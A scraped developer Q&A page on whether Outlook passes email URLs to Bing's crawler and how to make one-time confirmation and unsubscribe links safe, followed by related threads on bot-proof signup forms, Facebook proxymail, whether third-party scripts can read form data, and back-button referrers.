Are URLs in emails indexed by search engines so they become publicly searchable? - email

I have read a few questions on here about e-mail clients prefetching URLs in e-mails. An answer to this seems to be to add a new confirmation page, where the user has to click a button to confirm the desired action.
But, this answer states the following:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
This effectively makes all one-time use links like
login/pass-reset/etc useless.
(Users of my service were complaining that one-time login links don't
work for some of them and it appeared that BingPreview/1.0b is hitting
the URL before the user even opens the inbox)
Drupal seems to be experiencing the same problem:
https://www.drupal.org/node/2828034
My major concern is with this statement:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
If this is the case, any URL in an e-mail meant to confirm an action, e.g. confirming a login, subscription, or unsubscription, can end up searchable in a search engine, if that's whats meant by indexed in the quote above. In this case, it's Bing. Not even a dedicated confirmation page where the user confirms the desired action truly mitigates this.
Scenario #1
If I email the user a login link with a one-time token in the URL, that URL will end up in Bing. This token will have a short lifetime, lets say 5 minutes, so I doubt anyone will manage to search on Bing and find the URL before the user clicks it or it expires.
Scenario #2
The user gets an e-mail with a link to confirm a subscription. This link is perhaps valid for 24 hours. This might(?) be long enough for someone else to stumble over the link on a search engine and accidentally (or on purpose) confirm the subscription on behalf of the user.
Scenario #2 is not uncommon, it's even best practice to use double opt-in as far as I am aware.
Scenario #3
Unsubscribe URLs in the bottom of newsletters. Maybe valid for forever? You don't want this publicly searchable in an search engine.
Assume all the one-time confirmation links land on a confirmation page where the user confirms the desired action.
Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing? And will they actually end up publicly searchable? If not, what is meant by indexed in the quote above?
I'll add for the sake of completion that I don't think I've had much of a problem with this in my own use of the web, so my gut feeling is that this is unlikely the case.

Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing?
I can't definitely say if they are being indexed or not, only Bing could answer this question, but they are surely being visited, at least with a simple GET request. I just tested this sending myself a link to a page on my website that logs the requests that are made against it, and indeed I'm seeing a GET coming from 207.46.13.181 (reverse DNS says msnbot-207-46-13-181.search.msn.com), which suggests that an automated program from search.msn.com is crawling the link. This leads me to believe that yes, they are trying to index the link's content somehow, but it's only my opinion really.
And will they actually end up publicly searchable? If not, what is meant by "indexed" in the quote above?
Well, again, impossible to say unless you work for Bing. In any case, "indexing" means exactly what you think it does: parsing the content of a page to potentially include it in search results.
The real question here is: does this somehow represent a security problem or will it compromise my website's functionality?
It surely has the potential to: if your confirmation/reset/subscription/whatever process only relies on a single GET request with the appropriate GET parameter, then you should definitely revisit the strategy, as it obviously allows anyone to perform the action (even maliciously for example enumerating possible IDs for your GET parameters).
If the link you are trying to send contains sensible information or can be used to alter important data for an user of your website, then you should at least put it behind a login page only giving access to the interested user. This way, anyone who wants to access it (including search engines) will be redirected to a login page if not already logged in.
If the link you are trying to send is just some kind of harmless confirmation link (e.g. subscribe/unsubscribe from a newsletter), then at least use a form inside the web page to do the actual confirmation through a POST request (possibly also using a CSRF token), otherwise you will unequivocally end up with false positives.

Related

How websites like Facebook are protected against bot without any captcha

How websites like Facebook and Twitter are protected against bot during registration? I mean, there's no captcha at all on the signup form?
I want to create a signup form for a project, and I don't want bot during registration and Captchas are often ugly..
edit:
My question is really during the registration because I know Facebook uses Captchas once registred for the first time.
Facebook uses some sort of hidden spam protection, if you view source of sign-up form you will see things like:
class="hidden_elem"><div class="fsl fwb">Security Check</div>This is a standard security test that we use to prevent spammers from creating fake accounts and spamming users.
so capture becomes visible when javascript will think that you are a bot.
Where is few methods of making it harder for bots to complete registration without capture, things
like timing to fill out form, originators of mouse clicks events ect.
also random session based values in form (to privent direct submissions without downloading of the form first)
also some people use hidden form elements with common names like 'email' that is styled invisible in css but common simple bots will try to fill out all form fields and so you can block them if this hidden element have any value
twitter and fb spend lot of time on developing tecniques to block spammers i don't think they will made it public as it will be counter productive for them to fight the spammers.
But all the client side javascripts you can download from fb or twitter and study them if you want, because most of the protection will happen inside client not on server.
server could only issue some random session variable, check for valid headers in request, overall time etc. its really limited.
some sites are also use ajax exchanges between server and client during the time when user is filling out the form , mostly just to make it harder for bot developer to do simular fake exchanges of data.
Anyway, unfortunatelly where is no easy solution to do decent protection , espesially without captcha or some kind of question
also,
for submit button you can use image map instead of button,
you can dynamically create big image with a submit botton image drawn on it at random position using things like GDI in PHP and using css to display only portion of that image with the actuall button, and on server side check X and Y position of where mouse was clicked, this will be hard for bots to break.
Unless they use real browsers and just emulate keyboard and mouse. Anyway , as i said unfortunatelly where is no easy solution.
One way would be to send a verification to the user's email address or cell phone and obtain verification (so in that case, you would have to allow only one email address or cell phone per account)
Another option is to use "Negative CAPTCHA" or "Honeypot Captcha"
I don't know how Facebook and Twitter do it, but if you want to create something simple and that doesn't interfere with your site aesthetics, I know that some websites just ask the user to enter an answer to a simple math problem like "what is 2 + 3?". This is not the most secure way to do it, but it's just a thought.
Well you can always deploy hardware solutions as well to create Layer 4-7 firewall rules. You can create specific rules to look for the well known agents of bots crawling the web. However to stop newly created bots you need to know what agent they are using for the bot.
Since you don't want CAPTCHA, you can use Keypic - keypic.com - which is an invisible protection, no CAPTCHA needed. It's an efficient antispam method for any web form. Site users don't pass any tests which is good for the site as it improves the quality of the user experience and thus raises user engagement. The solution is a kind of an expert system which analyses the behaviour of the users and checks the databases, then makes a conclusion if the request comes from a legitimate user or a robot.
BTW, Twitter and Facebook still use CAPTCHA for password verification which is a very disputable method in terms of efficiency of such protection.
I had a problem with tons of bots signing up for my Nintendo site so I put a single image of Mario on the sign-up page (making sure nothing in the image data said "Mario") with the text "Who is this? Answer in one word." Haven't had a single bot sign-up since. Not sure if this is actually a good solution though, not sure how smart bots are. I'm kind of surprised that it worked.
In theory it might be keeping out a few legitimate users, but it is hard to imagine many legitimate users of a Nintendo site not knowing who Mario is...

Unsubscribe links in email marketing

Just signed up a third party email marketing provider, when I provide the template they give me a small tag to place which they subsitute with a user specific unsubscribe link.
My concern is that the link is single click, there is no subsequent confirmation, etc.. and whilst I am all for easy removal, I worry that any combination of malware scanners, AV engines, spam scanners will follow the link and thus unsubscribe many legitmate users.
Is this the norm to have a single HTTP GET request unsubscribe a user?
How are other developers handling this issue?
Note: The provider in question is critsend
Interesting question. It’s not the norm. But it’s common with cautious email service providers. For example, MailChimp also has a 1-click unsubscribe for his freemium users. I’m not a big fan of that, too. (I’d prefer a prefilled form field, where the user confirms his wish to unsubscribe by clicking "submit".) However, I didn’t witness any problems using 1-click-unsub until now.
FYI, here’s a discussion addressing a similar topic (false positive double opt-in confirmations). You might also want to check out this article and this discussion (forum registration required).
The norm is once clicked, it goes to a form which you click a button to confirm removal. That's strange there are even single clicks avaliable
Any side effect changing HTTP GET request is non-conforming as far as HTTP is concerned. In particular, see this from RFC 2616, section 9.1.1:
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.
It would be more standard to put the actual unsubscribe behind a form submission to cause a POST.
I know Campaign Monitor has built in procedures to catch non-user unsubscribes. Not sure about critsend.

Are proxymail.facebook.com email address still supported?

They all seem to be either bouncing explicitly or silently not going through now (0 open/click rate), and they had been working since they first introduced the feature. I know they aren't giving users the option to choose a proxymail.facebook.com address anymore in the newer Auth box. Thanks.
The answer is NO. Facebook no longer issues proxymail addresses.
Although there is no official reference which I can attach with this answer. But found this for reference.
Pretty sure it's still available to users, but Facebook rolls out
updates to their dialog boxes slowly, so it's possible a newer (or
even an older) one doesn't have that option.
This was one link where you had that:-
Now after the recent updates the Change button was removed.
I can answer the specific question I asked so long ago. I think Facebook must have had a bug for a while that broke the *#proxymail.facebook.com email integration, and it was during this period that I asked my original question. However, looking at our email logs, I can see that we have had people click on links in email sent to these Facebook proxy emails at the end of October, so whatever the issue was must have been resolved, and I believe if you have a Facebook proxy email, you can safely send to it.
That being said, of course the individual user may have revoked the email permission (in which case their proxy email will go to nowhere), and my impression is the same as sfussenegger that Facebook is no longer allowing users to use proxy email addresses. I haven't seen the option to anonymize my email in a FB permissions dialog in a long time...
does this answer your question?
Communicating Directly with Your Users via Email
The reason you're getting no click-rates, is because in all outgoing emails that go through the facebook proxymail servers, the remailer is rewriting the links. So stuff of the form:
<a href="http://www.domain.com/">
gets re-written as:
<a href="l.php/?u=http://www.domain.com/">
Which is a broken link, and so your open-detection or click-detection probably won't work at all. And undoubtedly, users are confused (as evidenced by my users who ran into this).

Google Analytics - can it collect form data?

Simple scenario:
I have a signup form, with user name, password, email address, may be credit card number.
At the bottom of the page, I implement the Google Analytics code.
when user clicks submit, it goes to a page wihtout google analytics.
question is..
can GA get the data (user naem, password..email..etc) in the first form after user input the data?
Do they say anything about it in their TOS or Privacy policy?
Yes. Any <script> you include in the page has complete access to alter the user's interaction with the site due to the Same Origin Policy. Google, if they were feeling Evil today, could certainly rewrite the action of your <form> to point to themselves, or log every keypress, or create an <iframe> containing another page on your site and simulate the user clicking on any action in that page.
Do not include <script> on any page from a party you don't completely trust with the security of everything on your site. Even a single tracking or advertiser script on any page compromises everything on the same hostname (and maybe other subdomains if you are setting window.domain to allow cross-hostname-scripting, or sharing cookies between hostnames).
However, the Analytics script doesn't currently do any of these things and the form submission will not flow to Google as a matter of course; they would have to deliberately act to steal the data. Clearly it would be disastrous for them to be discovered doing it, so they presumably won't. But technically, they could. It always pains me to see third-party ad and tracking scripts on bank sites.
UPDATE: The landscape has changed quite a bit over the years since my original answer below was written: the scripts are now generally served (or at least have the option to be fetched) over HTTPS, so those scripts should be secure against the trivial man-in-the-middle attacks. However, you are still trusting the script source not to do malicious stuff in your page, since they still get to fully control what happens on your web page.
Original answer:
Yes. I recommend against putting any third party script on sensitive pages secured by SSL. It's not likely that Google is going to hijack sensitive data on your page but you should take into account the possibility that a malicious ISP can hijack the request (say, using DNS) to Google Analytics script and do whatever it wants on your page.

is it possible to know where the user is coming from when he uses the back button?

For example,
if user goes to google -> example.com -> newwebsite.com
If he goes back to example.com, the http-referrer page will still be google.com
How can I detect that he went to newwebsite.com
I believe that the back button will send the HTTP headers that were sent to the site the first time around, since it's not really a new visit.
Say you displayed an error page if the user's http-referrer was newwebsite.com. The first time they visited, they would get your site. If they went to newwebsite.com, and then hit back (meaning they wanted to go back in time, through their browser history, not load the page again with new headers), then they would get an error page, and the nature of the back button would be defeated. I don't know if this inspires that behavior or not, it just makes sense to me that way.
Maybe it's possible, but it would be entirely browser-dependent. Why do you need this functionality, anyway? Newwebsite isn't referring the user to your website at all, there's no connection between the two at all--it just happens to be the last page that the user visited.
If a visitor uses the back button, the page might be loaded from browser cache. In that case, no referrer is sent.
Using google analytics, you can see how many visitors came from a given web site. This might give you some information.
I don't believe that this is generally possible. You could pull tricks with javascript on your site so that all the links navigated from there could be detected and recorded, but once the users off your site you've got no control.
If you provided the browser, ie. developed your one yourself, then you could choose to expose the browser history via an api.
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
Describes a technique for exploiting the browsers agreement to modify links to indicate that they have been traversed (eg. changing the colour of the link) so that visited sites can be detected, however this only works for a pre-declared set of links, it's not a generally applicable approach.
My feeling is that attempts to hide the nature of browsers - users can hop around all over the place - tend to lead to unsatisfactory 79% solutions that mystify users.
What problem are you actually trying to solve?
You can use sessions inorder to track the path of pages.it really works wwell.try it.